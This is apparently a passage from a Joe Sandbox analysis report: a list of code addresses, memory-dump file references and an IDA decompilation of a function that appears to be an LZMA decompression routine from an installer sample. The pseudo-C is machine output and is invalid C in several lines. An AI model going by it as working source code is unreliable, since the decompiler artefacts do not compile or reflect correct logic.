                                  					goto L1;
                                  				}
                                  			}














                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072ec
                                  0x004072e6
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x0040726d
                                  0x0040726a
                                  0x00000000
                                  0x00406ea1

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406FBB() {
                                  				unsigned short _t531;
                                  				signed int _t532;
                                  				void _t533;
                                  				signed int _t534;
                                  				signed int _t535;
                                  				signed int _t565;
                                  				signed int _t568;
                                  				signed int _t589;
                                  				signed int* _t606;
                                  				void* _t613;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t613 - 0x40) != 0) {
                                  						 *(_t613 - 0x84) = 0xb;
                                  						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                  						goto L132;
                                  					} else {
                                  						__eax =  *(__ebp - 0x28);
                                  						L88:
                                  						 *(__ebp - 0x2c) = __eax;
                                  						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  						L89:
                                  						__eax =  *(__ebp - 4);
                                  						 *(__ebp - 0x80) = 0x15;
                                  						__eax =  *(__ebp - 4) + 0xa68;
                                  						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  						L69:
                                  						 *(__ebp - 0x84) = 0x12;
                                  						while(1) {
                                  							L132:
                                  							 *(_t613 - 0x54) = _t606;
                                  							while(1) {
                                  								L133:
                                  								_t531 =  *_t606;
                                  								_t589 = _t531 & 0x0000ffff;
                                  								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  								if( *(_t613 - 0xc) >= _t565) {
                                  									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  									 *(_t613 - 0x40) = 1;
                                  									_t532 = _t531 - (_t531 >> 5);
                                  									 *_t606 = _t532;
                                  								} else {
                                  									 *(_t613 - 0x10) = _t565;
                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                  								}
                                  								if( *(_t613 - 0x10) >= 0x1000000) {
                                  									goto L139;
                                  								}
                                  								L137:
                                  								if( *(_t613 - 0x6c) == 0) {
                                  									 *(_t613 - 0x88) = 5;
                                  									L170:
                                  									_t568 = 0x22;
                                  									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                  									_t535 = 0;
                                  									L172:
                                  									return _t535;
                                  								}
                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                  								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  								L139:
                                  								_t533 =  *(_t613 - 0x84);
                                  								while(1) {
                                  									 *(_t613 - 0x88) = _t533;
                                  									while(1) {
                                  										L1:
                                  										_t534 =  *(_t613 - 0x88);
                                  										if(_t534 > 0x1c) {
                                  											break;
                                  										}
                                  										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                                  											case 0:
                                  												if( *(_t613 - 0x6c) == 0) {
                                  													goto L170;
                                  												}
                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  												_t534 =  *( *(_t613 - 0x70));
                                  												if(_t534 > 0xe1) {
                                  													goto L171;
                                  												}
                                  												_t538 = _t534 & 0x000000ff;
                                  												_push(0x2d);
                                  												asm("cdq");
                                  												_pop(_t570);
                                  												_push(9);
                                  												_pop(_t571);
                                  												_t609 = _t538 / _t570;
                                  												_t540 = _t538 % _t570 & 0x000000ff;
                                  												asm("cdq");
                                  												_t604 = _t540 % _t571 & 0x000000ff;
                                  												 *(_t613 - 0x3c) = _t604;
                                  												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                  												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                  												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                  												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                  													L10:
                                  													if(_t612 == 0) {
                                  														L12:
                                  														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                  														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  														goto L15;
                                  													} else {
                                  														goto L11;
                                  													}
                                  													do {
                                  														L11:
                                  														_t612 = _t612 - 1;
                                  														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                  													} while (_t612 != 0);
                                  													goto L12;
                                  												}
                                  												if( *(_t613 - 4) != 0) {
                                  													GlobalFree( *(_t613 - 4));
                                  												}
                                  												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                  												 *(_t613 - 4) = _t534;
                                  												if(_t534 == 0) {
                                  													goto L171;
                                  												} else {
                                  													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                  													goto L10;
                                  												}
                                  											case 1:
                                  												L13:
                                  												__eflags =  *(_t613 - 0x6c);
                                  												if( *(_t613 - 0x6c) == 0) {
                                  													 *(_t613 - 0x88) = 1;
                                  													goto L170;
                                  												}
                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  												_t45 = _t613 - 0x48;
                                  												 *_t45 =  *(_t613 - 0x48) + 1;
                                  												__eflags =  *_t45;
                                  												L15:
                                  												if( *(_t613 - 0x48) < 4) {
                                  													goto L13;
                                  												}
                                  												_t546 =  *(_t613 - 0x40);
                                  												if(_t546 ==  *(_t613 - 0x74)) {
                                  													L20:
                                  													 *(_t613 - 0x48) = 5;
                                  													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                  													goto L23;
                                  												}
                                  												 *(_t613 - 0x74) = _t546;
                                  												if( *(_t613 - 8) != 0) {
                                  													GlobalFree( *(_t613 - 8)); // executed
                                  												}
                                  												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                  												 *(_t613 - 8) = _t534;
                                  												if(_t534 == 0) {
                                  													goto L171;
                                  												} else {
                                  													goto L20;
                                  												}
                                  											case 2:
                                  												L24:
                                  												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                  												 *(_t613 - 0x84) = 6;
                                  												 *(_t613 - 0x4c) = _t553;
                                  												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                  												L132:
                                  												 *(_t613 - 0x54) = _t606;
                                  												goto L133;
                                  											case 3:
                                  												L21:
                                  												__eflags =  *(_t613 - 0x6c);
                                  												if( *(_t613 - 0x6c) == 0) {
                                  													 *(_t613 - 0x88) = 3;
                                  													goto L170;
                                  												}
                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  												_t67 = _t613 - 0x70;
                                  												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                  												__eflags =  *_t67;
                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  												L23:
                                  												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                  												if( *(_t613 - 0x48) != 0) {
                                  													goto L21;
                                  												}
                                  												goto L24;
                                  											case 4:
                                  												L133:
                                  												_t531 =  *_t606;
                                  												_t589 = _t531 & 0x0000ffff;
                                  												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  												if( *(_t613 - 0xc) >= _t565) {
                                  													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  													 *(_t613 - 0x40) = 1;
                                  													_t532 = _t531 - (_t531 >> 5);
                                  													 *_t606 = _t532;
                                  												} else {
                                  													 *(_t613 - 0x10) = _t565;
                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                  												}
                                  												if( *(_t613 - 0x10) >= 0x1000000) {
                                  													goto L139;
                                  												}
                                  											case 5:
                                  												goto L137;
                                  											case 6:
                                  												__edx = 0;
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x34) = 1;
                                  													 *(__ebp - 0x84) = 7;
                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  													while(1) {
                                  														L132:
                                  														 *(_t613 - 0x54) = _t606;
                                  														goto L133;
                                  													}
                                  												}
                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  												__esi =  *(__ebp - 0x60);
                                  												__cl = 8;
                                  												__cl = 8 -  *(__ebp - 0x3c);
                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  												__ecx =  *(__ebp - 0x3c);
                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  												__ecx =  *(__ebp - 4);
                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  												__eflags =  *(__ebp - 0x38) - 4;
                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  												if( *(__ebp - 0x38) >= 4) {
                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                  													if( *(__ebp - 0x38) >= 0xa) {
                                  														_t98 = __ebp - 0x38;
                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                  														__eflags =  *_t98;
                                  													} else {
                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  													}
                                  												} else {
                                  													 *(__ebp - 0x38) = 0;
                                  												}
                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                  												if( *(__ebp - 0x34) == __edx) {
                                  													__ebx = 0;
                                  													__ebx = 1;
                                  													goto L61;
                                  												} else {
                                  													__eax =  *(__ebp - 0x14);
                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  													__eflags = __eax -  *(__ebp - 0x74);
                                  													if(__eax >=  *(__ebp - 0x74)) {
                                  														__eax = __eax +  *(__ebp - 0x74);
                                  														__eflags = __eax;
                                  													}
                                  													__ecx =  *(__ebp - 8);
                                  													__ebx = 0;
                                  													__ebx = 1;
                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  													goto L41;
                                  												}
                                  											case 7:
                                  												__eflags =  *(__ebp - 0x40) - 1;
                                  												if( *(__ebp - 0x40) != 1) {
                                  													__eax =  *(__ebp - 0x24);
                                  													 *(__ebp - 0x80) = 0x16;
                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  													__eax =  *(__ebp - 0x28);
                                  													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  													__eax =  *(__ebp - 0x2c);
                                  													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  													__eax = 0;
                                  													__eflags =  *(__ebp - 0x38) - 7;
                                  													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  													__al = __al & 0x000000fd;
                                  													__eax = (__eflags >= 0) - 1 + 0xa;
                                  													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  													__eax =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 4) + 0x664;
                                  													__eflags = __eax;
                                  													 *(__ebp - 0x58) = __eax;
                                  													goto L69;
                                  												}
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 8;
                                  												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  												while(1) {
                                  													L132:
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											case 8:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x84) = 0xa;
                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  												} else {
                                  													__eax =  *(__ebp - 0x38);
                                  													__ecx =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                  													 *(__ebp - 0x84) = 9;
                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  												}
                                  												while(1) {
                                  													L132:
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											case 9:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													goto L89;
                                  												}
                                  												__eflags =  *(__ebp - 0x60);
                                  												if( *(__ebp - 0x60) == 0) {
                                  													goto L171;
                                  												}
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                  												__eflags = _t259;
                                  												0 | _t259 = _t259 + _t259 + 9;
                                  												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                  												goto L76;
                                  											case 0xa:
                                  												goto L0;
                                  											case 0xb:
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__ecx =  *(__ebp - 0x24);
                                  													__eax =  *(__ebp - 0x20);
                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												} else {
                                  													__eax =  *(__ebp - 0x24);
                                  												}
                                  												__ecx =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												goto L88;
                                  											case 0xc:
                                  												L99:
                                  												__eflags =  *(__ebp - 0x6c);
                                  												if( *(__ebp - 0x6c) == 0) {
                                  													 *(__ebp - 0x88) = 0xc;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x70);
                                  												__eax =  *(__ebp - 0xc);
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  												_t334 = __ebp - 0x70;
                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                  												__eflags =  *_t334;
